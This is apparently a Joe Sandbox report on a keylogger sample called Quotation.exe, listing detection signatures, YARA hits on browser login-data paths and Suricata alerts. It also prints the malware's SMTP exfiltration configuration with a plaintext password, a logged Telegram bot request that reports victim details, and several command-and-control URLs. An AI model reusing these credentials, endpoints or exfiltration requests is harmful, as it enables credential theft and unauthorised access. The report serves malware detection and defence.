Edit tour

Windows Analysis Report
Quotation.exe

Overview

General Information

Sample name:	Quotation.exe
Analysis ID:	1527820
MD5:	f485d8c73bcc8ac6ab3f432f2258d030
SHA1:	7f990d4304126a8d731b0b5a99be8a5dad0d0090
SHA256:	7f285582f0f5bcda85cbc485d3e29ff0cc0693f68a6d2be98fac0866b1524f67
Tags:	exeuser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Quotation.exe (PID: 2168 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: F485D8C73BCC8AC6AB3F432F2258D030)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "manoj@electradubai.com", "Password": "LordHaveMercy!!123", "Host": "mail.electradubai.com", "Port": "25", "Version": "4.4"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Quotation.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Quotation.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Quotation.exe	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Quotation.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Quotation.exe	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dfba:$a1: get_encryptedPassword 0x2e2d7:$a2: get_encryptedUsername 0x2ddca:$a3: get_timePasswordChanged 0x2ded3:$a4: get_passwordField 0x2dfd0:$a5: set_encryptedPassword 0x2f627:$a7: get_logins 0x2f58a:$a10: KeyLoggerEventArgs 0x2f1ef:$a11: KeyLoggerEventArgsEventHandler
Quotation.exe	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bd88:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b42b:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b688:$a4: \Orbitum\User Data\Default\Login Data 0x3c067:$a5: \Kometa\User Data\Default\Login Data
Quotation.exe	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2eb8e:$s1: UnHook 0x2eb95:$s2: SetHook 0x2eb9d:$s3: CallNextHook 0x2ebaa:$s4: _hook
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.4104956397.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2ddba:$a1: get_encryptedPassword 0x2e0d7:$a2: get_encryptedUsername 0x2dbca:$a3: get_timePasswordChanged 0x2dcd3:$a4: get_passwordField 0x2ddd0:$a5: set_encryptedPassword 0x2f427:$a7: get_logins 0x2f38a:$a10: KeyLoggerEventArgs 0x2efef:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.4104956397.0000000002991000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Quotation.exe PID: 2168	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Quotation.exe PID: 2168	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Quotation.exe PID: 2168	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Quotation.exe PID: 2168	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd1fdc:$a1: get_encryptedPassword 0xd22ef:$a2: get_encryptedUsername 0xd1df6:$a3: get_timePasswordChanged 0xd1eff:$a4: get_passwordField 0xd1ff2:$a5: set_encryptedPassword 0xd449f:$a7: get_logins 0xd4402:$a10: KeyLoggerEventArgs 0xd406b:$a11: KeyLoggerEventArgsEventHandler
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.Quotation.exe.450000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.Quotation.exe.450000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.Quotation.exe.450000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.0.Quotation.exe.450000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.0.Quotation.exe.450000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dfba:$a1: get_encryptedPassword 0x2e2d7:$a2: get_encryptedUsername 0x2ddca:$a3: get_timePasswordChanged 0x2ded3:$a4: get_passwordField 0x2dfd0:$a5: set_encryptedPassword 0x2f627:$a7: get_logins 0x2f58a:$a10: KeyLoggerEventArgs 0x2f1ef:$a11: KeyLoggerEventArgsEventHandler
0.0.Quotation.exe.450000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bd88:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b42b:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b688:$a4: \Orbitum\User Data\Default\Login Data 0x3c067:$a5: \Kometa\User Data\Default\Login Data
0.0.Quotation.exe.450000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2eb8e:$s1: UnHook 0x2eb95:$s2: SetHook 0x2eb9d:$s3: CallNextHook 0x2ebaa:$s4: _hook
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 192.250.231.25, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Users\user\Desktop\Quotation.exe, Initiated: true, ProcessId: 2168, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49727

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T10:13:31.432429+0200	2803305	3	Unknown Traffic	192.168.2.8	49706	188.114.96.3	443	TCP
2024-10-07T10:13:35.384647+0200	2803305	3	Unknown Traffic	192.168.2.8	49712	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T10:13:29.091145+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49704	132.226.247.73	80	TCP
2024-10-07T10:13:30.888015+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49704	132.226.247.73	80	TCP
2024-10-07T10:13:32.154035+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49707	132.226.247.73	80	TCP
2024-10-07T10:13:33.450514+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49709	132.226.247.73	80	TCP
2024-10-07T10:13:34.825502+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49711	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Quotation.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081	URL Reputation: Label: malware

Found malware configuration

Source: 0.0.Quotation.exe.450000.0.unpack

Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "manoj@electradubai.com", "Password": "LordHaveMercy!!123", "Host": "mail.electradubai.com", "Port": "25", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: Quotation.exe	ReversingLabs: Detection: 71%
Source: Quotation.exe	Virustotal: Detection: 70%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Quotation.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Quotation.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49705 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49721 version: TLS 1.2

Source: Quotation.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4x nop then jmp 00C2F45Dh	0_2_00C2F2C0
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4x nop then jmp 00C2F45Dh	0_2_00C2F4AC
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4x nop then jmp 00C2F45Dh	0_2_00C2F52F
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4x nop then jmp 00C2FC19h	0_2_00C2F961

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: Quotation.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2007/10/2024%20/%2015:28:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CNSV-LLCUS CNSV-LLCUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49709 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49707 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49704 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49706 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49712 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49705 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2007/10/2024%20/%2015:28:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.electradubai.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 07 Oct 2024 08:13:41 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Quotation.exe, 00000000.00000002.4104956397.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Quotation.exe	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Quotation.exe	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Quotation.exe	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Quotation.exe, 00000000.00000002.4104956397.0000000002991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Quotation.exe, 00000000.00000002.4104956397.0000000002991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Quotation.exe	String found in binary or memory: http://checkip.dyndns.org/q
Source: Quotation.exe, 00000000.00000002.4104956397.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.electradubai.com
Source: Quotation.exe, 00000000.00000002.4104956397.0000000002991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Quotation.exe	String found in binary or memory: http://varders.kozow.com:8081
Source: Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Quotation.exe, 00000000.00000002.4104956397.0000000002A75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Quotation.exe	String found in binary or memory: https://api.telegram.org/bot
Source: Quotation.exe, 00000000.00000002.4104956397.0000000002A75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Quotation.exe, 00000000.00000002.4104956397.0000000002A75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20a
Source: Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Quotation.exe, 00000000.00000002.4104956397.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.0000000002B42000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.0000000002B82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Quotation.exe, 00000000.00000002.4104956397.0000000002B4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Quotation.exe, 00000000.00000002.4104956397.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.00000000029DE000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.0000000002A75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Quotation.exe	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Quotation.exe, 00000000.00000002.4104956397.0000000002A09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: Quotation.exe, 00000000.00000002.4104956397.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.0000000002A09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Quotation.exe, 00000000.00000002.4104956397.0000000002B82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: Quotation.exe, 00000000.00000002.4104956397.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49721 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: Quotation.exe, type: SAMPLE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Quotation.exe, type: SAMPLE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: Quotation.exe, type: SAMPLE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Quotation.exe PID: 2168, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Quotation.exe

